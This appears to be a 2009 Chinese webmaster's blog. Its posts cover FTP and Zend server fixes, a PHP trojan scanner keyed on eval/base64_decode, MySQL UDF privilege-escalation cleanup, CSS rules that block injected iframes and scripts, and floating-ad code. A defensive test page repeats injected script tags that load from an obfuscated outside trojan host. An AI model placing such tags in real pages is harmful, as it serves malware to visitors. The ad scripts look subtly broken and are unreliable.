此内容被密码保护
作者:monface 发布时间:June 28, 2009 分类:随&杂
变形金刚2 主题曲 MV
作者:monface 发布时间:June 27, 2009 分类:随&杂
变形金刚2又将从中国卷走大批票房,当然电影其中也加入了不少中国元素.值得国内的这些所谓大牌导演深思了,不要再吹自己的影片如何如何好,演员如何如何卖力表演.票房胜于雄辩.看看火爆的排队购票队伍,国产电影有哪一部做到这个地步?
不同于其他好莱坞大片动作片预告比电影本身精彩的惯例,变形金刚2的预告比不上电影百分之一的火爆,还是建议去电影院看,那里的音响效果和屏幕效果值得你花钱去享受那超值的147分钟。
最后说一下那些所谓的大牌明星,非要根据什么剧情,或者要好导演,好的对手演员才出演,爬你妈的,你作为一个演员,连最基本的职业素养都没有,你还演什么系.就像你是一个营业员,你难道还要挑顾客?还要挑你卖的东西?这点还是要赞一下黄秋生,人家是什么片子都接,这才是作为一个演员的基本前提.
FTP服务器换成了FileZilla Server
作者:monface 发布时间:June 26, 2009 分类:服务器
serv-u自从7.0版本起,居然内置网页服务器,越来越臃肿,速度好像没以前6系列的快了.而且他们说漏洞很多,我们是菜鸟论坛,于是乎,决定把FTP服务器换掉,换成了FileZilla Server.我们还是支持一下正版嘛,
FileZilla Server 是一款小巧,安全,免费的FTP服务端软件
下载地址http://filezilla-project.org/download.php?type=server
是经典的开源FTP解决方案,包括FileZilla客户端和FileZilla Server。其中,FileZilla Server的功能比起商业软件FTP Serv-U毫不逊色。FileZilla Server几乎无用户数限制;多线程引擎;在 Windows NT4、2000、XP下以服务形式运行;针对 fxp/反弹攻击过滤;安全密码储存 (使用 MD5 hash);实时对用户/组进行管理;所有选项可以在服务器在线时改变,无需服务器下线;传输超时功能可以踢掉使用普通工具保持一直在线的空闲用户;基于设置规则的服务器和用户/组速度限制;支持 MODE Z 文件传输压缩。
问:听说FileZilla不能续传,是真的吗?
答:那是很久以前的事,现在的新版可以续传。
ZendOptimizer报告Unable to view file mapping 错误及详细解决办法
作者:monface 发布时间:June 26, 2009 分类:服务器
服务器从6.20上午11点出现无法访问,由于外出,中午时分有朋友说他杀毒软件无法升级(因为他杀毒软件是通过我服务器提供的升级地址升级的),马上猜想可能服务器有问题,用手机访问,果然无法打开.下午4点钟才回到家,马上远程连接,可以登录,进入服务器查看,apache运行状态正常,但是就是无法打开网页.重启apache,还是不行.重启服务器,问题解决.以为是正常apache 在windows发生的间歇性短路.可是没想到半个小时后,有出现问题.重启apache还是不行,只有把服务器重启. 重启后1分钟,发现杀毒软件和防火墙占用cpu几乎达到100%,是有人攻击吗?查看网络连接,发现数据包并不大,再查看事件查看器,发现zend报错Unable to view file mapping,于是搜索相关解决办法.根据以下方法解决问题.
XML/HTML代码
- Unable to open base address file:系统找不到指定的路径。
- Unable to view file mapping:重叠 I/O 操作在进行中。
- 下面分享我的问题核心:出现这样的问题,一般是缓存目录指定错误所导致的!
- 步骤方法:右击我的电脑 - 属性 - 高级 - 环境变量 - 将用户配置里的TEMP与TMP的路径指定为系统变量里的TEMP与TMP的路径值:如%SystemRoot%\TEMP或者其他路径确定路径,如D:\Temp这个路径确定,重启电脑。
- 设置好的参考图片如下:
- 再次运行php服务器程序,C盘根目录下再不出现ZendOptimizer_errors.txt报告,报告里也不会出现上面的两个错误了,设置好的路径目录下自动生成了ZendOptimizer.MemoryBase@SYSTEM等这两个文件。问题解决!
- 2009年5月23日补充:
- 复制内容到剪贴板
- 代码:
- 解决办法:
- 1、修改C:\WINDOWS\Temp\目录的访问权限,使Zend可以对目录进行修改,一般添加IIS_WPG和Network Service的写入权限就够了。
- 2、有可能在C:\WINDOWS\temp\目录下找不到指定文件,查找该文件夹下是否有文件名ZendOptimizer.MemoryBase@SYSTEM和ZendOptimizer.MemoryBase@NETWORK SERVICE,如果没有,新建这两个文件,空文件即可。
- 3、php.ini文件中设置upload_tmp_dir = "c:\windows\temp\"(注意=两边的空格)。
- 4、还有可能就是没有读取ZEND目录的权限,为C:\Program Files\ZendOptimizer-2.6.2\lib\目录添加IIS_WPG和Network Service的读取权限(注意zend版本和安装目录不同时前面的路径也有所不同)
- 注意:前面提到的“C:\WINDOWS\Temp\”上当并非绝对,关键看php.ini文件中“upload_tmp_dir”等于什么路径。
- 2009年3月25日补充:
- 在Windows Server 2003 系统的NTFS的文件系统中,还涉及到访问权限问题,如ZendOptimizer的默认安装目录为C:\Program Files\Zend,我们需要给Zend这个目录添加一个IIS的启动账户IIS_WPG的读取运行,列出目录,读取的权限。这样就能解决因权限导致的Unable to view file mapping错误。
- 错误报告摘录如下:
- [432] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [432] Unable to write base address:[3]系统找不到指定的路径。
- [484] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [484] Unable to open base address file:[3]系统找不到指定的路径。
- [484] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [484] Unable to open base address file:[3]系统找不到指定的路径。
- [484] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [2672] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2672] Unable to write base address:[3]系统找不到指定的路径。
- [3540] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3540] Unable to open base address file:[3]系统找不到指定的路径。
- [3540] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3540] Unable to open base address file:[3]系统找不到指定的路径。
- [3540] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [3504] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3504] Unable to write base address:[3]系统找不到指定的路径。
- [2640] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2640] Unable to open base address file:[3]系统找不到指定的路径。
- [2640] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2640] Unable to open base address file:[3]系统找不到指定的路径。
- [2640] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [3968] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3968] Unable to write base address:[3]系统找不到指定的路径。
- [1892] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [1892] Unable to open base address file:[3]系统找不到指定的路径。
- [1892] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [1892] Unable to open base address file:[3]系统找不到指定的路径。
- [1892] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [3556] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3556] Unable to write base address:[3]系统找不到指定的路径。
- [4084] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [4084] Unable to open base address file:[3]系统找不到指定的路径。
- [4084] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [4084] Unable to open base address file:[3]系统找不到指定的路径。
- [4084] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [3972] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3972] Unable to write base address:[3]系统找不到指定的路径。
- [1308] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [1308] Unable to open base address file:[3]系统找不到指定的路径。
- [1308] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [1308] Unable to open base address file:[3]系统找不到指定的路径。
- [1308] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [3844] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3844] Unable to write base address:[3]系统找不到指定的路径。
- [2300] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2300] Unable to open base address file:[3]系统找不到指定的路径。
- [2300] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2300] Unable to open base address file:[3]系统找不到指定的路径。
- [2300] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [2288] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2288] Unable to write base address:[3]系统找不到指定的路径。
- [2144] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2144] Unable to open base address file:[3]系统找不到指定的路径。
- [2144] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2144] Unable to open base address file:[3]系统找不到指定的路径。
- [2144] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [2052] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2052] Unable to write base address:[3]系统找不到指定的路径。
- [2916] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2916] Unable to open base address file:[3]系统找不到指定的路径。
- [2916] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2916] Unable to open base address file:[3]系统找不到指定的路径。
- [2916] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [3532] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3532] Unable to write base address:[3]系统找不到指定的路径。
- [3332] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3332] Unable to open base address file:[3]系统找不到指定的路径。
- [3332] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3332] Unable to open base address file:[3]系统找不到指定的路径。
- [3332] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [2748] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2748] Unable to write base address:[3]系统找不到指定的路径。
- [2484] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2484] Unable to open base address file:[3]系统找不到指定的路径。
- [2484] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2484] Unable to open base address file:[3]系统找不到指定的路径。
- [2484] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [5672] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [5672] Unable to write base address:[3]系统找不到指定的路径。
- [5772] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [5772] Unable to open base address file:[3]系统找不到指定的路径。
- [5772] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [5772] Unable to open base address file:[3]系统找不到指定的路径。
- [5772] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [5188] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [5188] Unable to write base address:[3]系统找不到指定的路径。
- [5280] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [5280] Unable to open base address file:[3]系统找不到指定的路径。
- [5280] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [5280] Unable to open base address file:[3]系统找不到指定的路径。
- [5280] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [4888] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [4888] Unable to write base address:[3]系统找不到指定的路径。
- [4936] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [4936] Unable to open base address file:[3]系统找不到指定的路径。
- [4936] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [4936] Unable to open base address file:[3]系统找不到指定的路径。
- [4936] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [2552] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [2552] Unable to write base address:[3]系统找不到指定的路径。
- [3404] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3404] Unable to open base address file:[3]系统找不到指定的路径。
- [3404] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3404] Unable to open base address file:[3]系统找不到指定的路径。
- [3404] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [3720] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [3720] Unable to write base address:[3]系统找不到指定的路径。
- [4044] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [4044] Unable to open base address file:[3]系统找不到指定的路径。
- [4044] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [4044] Unable to open base address file:[3]系统找不到指定的路径。
- [4044] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
- [1356] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [1356] Unable to write base address:[3]系统找不到指定的路径。
- [1060] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [1060] Unable to open base address file:[3]系统找不到指定的路径。
- [1060] D:\Program Files\VertrigoServ\Apache\%SYSTE~1\TEMP\ZendOptimizer.MemoryBase@SYSTEM:[3]系统找不到指定的路径。
- [1060] Unable to open base address file:[3]系统找不到指定的路径。
- [1060] Unable to view file mapping:[997]重叠 I/O 操作在进行中。
解决办法:
右击我的电脑 - 属性 - 高级 - 环境变量 - 将用户配置里的TEMP与TMP的路径指定为系统变量里的TEMP与TMP的路径值:如%SystemRoot%\TEMP或者其他路径确定路径
或者都改为%SystemRoot%\TEMP
1.修改C:\WINDOWS\Temp\目录的访问权限,使Zend可以对目录进行修改
一般添加IIS_WPG和Network Service的写入权限就够了
2.有可能在C:\WINDOWS\temp\目录下找不到该文件,方法是新建文件名为ZendOptimizer.MemoryBase@SYSTEM和ZendOptimizer.MemoryBase@NETWORK SERVICE(如果没有)空文件即可
3.php.ini文件中设置upload_tmp_dir = "c:\windows\temp\"(注意=两边的空格)
4.还有可能就是IIS没有读取ZEND目录的权限,为C:\Program Files\ZendOptimizer-2.6.2\lib\Optimizer-2.6.2目录和C:\Program Files\ZendOptimizer-2.6.2\lib\ZendExtensionManager.dll文件添加iis_isur读取权限(注意版本不同可能路径也有所不同)
5.php文件目录也加上iis_isur和networtk service的读取权限
因为我并非IIS,所以解决方法中的IIS_WPG帐户不用添加,并且在zend目录添加NETWORK SERVICE帐户的访问权.问题得到解决.
菜鸟站长漫漫成长,留下脚印.
php木马网检测小程序与常见木马清除方法
作者:monface 发布时间:June 13, 2009 分类:服务器
1、中国开源软件很多,但同时也给我们带来很多安全问题,网站挂马成发站长最头痛事情,在这里我写一个检测网站木马PHP小程序让大家参考。
软件原理:一般木马都加密,所谓加密反而让我们检测带来方便,PHP木马最明显特征使用 eval 与 base64_decode 这函数,这样就很好去检测,当然有些CMS正常文件也可出现这东西,区别CMS文件打开正常一行一行,而木马通常:
eval(base64_decode(..............));
?>
这样代码,而且基本都如此,下面检测程序:
function parAllFiles($d)
{
$dh = dir($d);
while($filename = $dh->read() )
{
if($filename=='.' || $filename=='..') continue;
$tfile = $d.'/'.$filename;
if(is_dir($tfile))
{
//echo "检查到: $tfile
";
parAllFiles($tfile);
}
else
{
if(!ereg("\.php", $tfile)) continue;
$bd = file_get_contents($tfile);
if(eregi("eval\(", $bd))
{
echo "$tfile
\r\n";
}
}
}
}
parAllFiles(dirname(__FILE__));
?>
使用这个检测程序会把所有带eval文件作为可疑文件,打开来看一下,如果代码像前者那样,肯定木马。
对于有使用服务器用户,记住设置网站权限一个原则:存放HTML、附件文件不给予执行脚本权限,执行脚本文件夹不给予写入权限。
2、MySQL提权漏洞处理
MySQL提权漏洞在windows服务器几乎致命,如果你把WEB木马都清理后,发现黑客还挂马,很可这个问题所致,这要作下面几方面处理:
(1) 网站用户千万不要用root用户,如果建立一个没权限用户,然后指定它有操作某数据库权限;
(2) 检查网站或windows文件,看否有 udf.dll 或 xudf.dll (x通常数字1、2、3等),如果有,说明你服务器已经中招,这种木马致命,清除方法先用net stop mysql停止Mysql,然后删除这些dll文件,然后用 net start mysql 重新启动mysql。
(目前在phpcms2008、php168最新版都已经发现可实现mysql提权致命漏洞,建议做新站尽量用dedecmsV5.3或Ecms V5.1)
二行代码解决全部网页木马(含iframe/script木马)
作者:monface 发布时间:June 12, 2009 分类:服务器
解决方案1:
XML/HTML代码
- iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
- script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面。
解决方案2:
XML/HTML代码
- iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
- script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
解决方案3:
XML/HTML代码
- iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
- script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}
原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。
解决方案4:
XML/HTML代码
- iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
- script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}
原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。
解决方案5:
XML/HTML代码
- iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
- script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}
第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script>
以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)
XML/HTML代码
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[url]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"[/url]>
- <html xmlns="[url]http://www.w3.org/1999/xhtml"[/url]>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>让JS木马的进程迅速中止的CSS代码</title>
- <style type="text/css" id="LinrStudio">
- /*<![CDATA[*/
- iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
- script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
- /* 以后请在此关注最新木马处理方法:[url]http://www.nihaoku.cn/ff/api.htm[/url] */
- /*]]>*/
- </style>
- </head>
- <body>
- <script type="text/javascript" src="1.js"></script>
- <script src=http://%76%63%63%64%2E%63%6E></script>
- <script src="[url]http://%76%63%63%64%2E%63%6E"[/url] type="text/javascript"></script>
- <script src=http://%76%63%63%64%2E%63%6E></script>
- 我是页面本身的1
- <script src=http://%76%63%63%64%2E%63%6E></script>
- 我是页面本身的2
- <script src=http://%76%63%63%64%2E%63%6E></script>
- 我是页面本身的3
- <script src=http://%76%63%63%64%2E%63%6E></script>
- </body>
- </html>
其中1.js是自己本站的:
XML/HTML代码
- document.write("我是本站的JS文件");
- document.write("<img src='http://www.baidu.com/p_w_picpaths/logo.gif' />");
漂浮窗口代码 怎么写
作者:monface 发布时间:June 12, 2009 分类:服务器
漂浮窗口代码带关闭按钮
XML/HTML代码
- <script type="text/javascript">
- function hidead()
- {document.getElementById("ad").style.display="none";}
- </script>
- <div id="ad" style="position:absolute">
- <a href="http://meiniu.5d6d.com/thread-15-1-1.html"target="_blank">
- <img src="{S_URL}/templates/$_SCONFIG[template]/images/xiwangbei.jpg" >
- </a>
- <DIV style="FONT-SIZE: 9pt; CURSOR: hand" align=right>关闭×</DIV></div>
- <script>
- var x = 50,y = 60
- var xin = true, yin = true
- var step = 1
- var delay = 1
- var obj=document.getElementById("ad")
- function floatAD() {
- var L=T=0
- var R= document.body.clientWidth-obj.offsetWidth
- var B = document.body.clientHeight-obj.offsetHeight
- obj.style.left = x + document.body.scrollLeft
- obj.style.top = y + document.body.scrollTop
- xx = x + step*(xin?1:-1)
- if (x < L) { xin = true; x = L}
- if (x > R){ xin = false; x = R}
- yy = y + step*(yin?1:-1)
- if (y < T) { yin = true; y = T }
- if (y > B) { yin = false; y = B }
- }
- var itl= setInterval("floatAD()", delay)
- obj.onmouseover=function(){clearInterval(itl)}
- obj.onmouseout=function(){itl=setInterval("floatAD()", delay)}
- </script>
以下代码不含关闭窗口
XML/HTML代码
- <div id="move">
- <SCRIPT>
- var imagepath="{S_URL}/templates/$_SCONFIG[template]/images/xiwangbei.jpg" //这里是浮动图片的地址
- var imagewidth=100 //这两行写图片的大小
- var imageheight=100
- var speed=3;
- var imageclick="http://meiniu.5d6d.com/thread-15-1-1.html" //这里写点击图片连接到的地址
- var hideafter=0
- var isie=0;
- if(window.navigator.appName=="Microsoft Internet Explorer"&&window.navigator.appVersion.substring(window.navigator.appVersion.indexOf("MSIE")+5,window.navigator.appVersion.indexOf("MSIE")+8)>=5.5) {
- isie=1;
- }
- else {
- isie=0;
- }
- if(isie){
- var preloadit=new Image()
- preloadit.src=imagepath
- }
- function pop() {
- if(isie) {
- xx=x+dx;yy=y+dy;
- oPopup.show(x, y, imagewidth, imageheight);
- if(x+imagewidth+5>screen.width) dx=-dx;
- if(y+imageheight+5>screen.height) dy=-dy;
- if(x<0) dx=-dx;
- if(y<0) dy=-dy;
- startani=setTimeout("pop();",50);
- }
- }
- function dismisspopup(){
- clearTimeout(startani)
- oPopup.hide()
- }
- function dowhat(){
- if (imageclick=="dismiss")
- dismisspopup()
- else
- window.open(imageclick);
- }
- if(isie) {
- var x=0,y=0,dx=speed,dy=speed;
- var oPopup = window.createPopup();
- var oPopupoPopupBody = oPopup.document.body;
- oPopupBody.style.cursor="hand"
- oPopupBody.innerHTML = '<IMG SRC="'+preloadit.src+'">';
- oPopup.document.body.onmouseover=new Function("clearTimeout(startani)")
- oPopup.document.body.onmouseout=pop
- oPopup.document.body.onclick=dowhat
- pop();
- if (hideafter>0)
- setTimeout("dismisspopup()",hideafter*1000)
- }
- </SCRIPT>
- </div>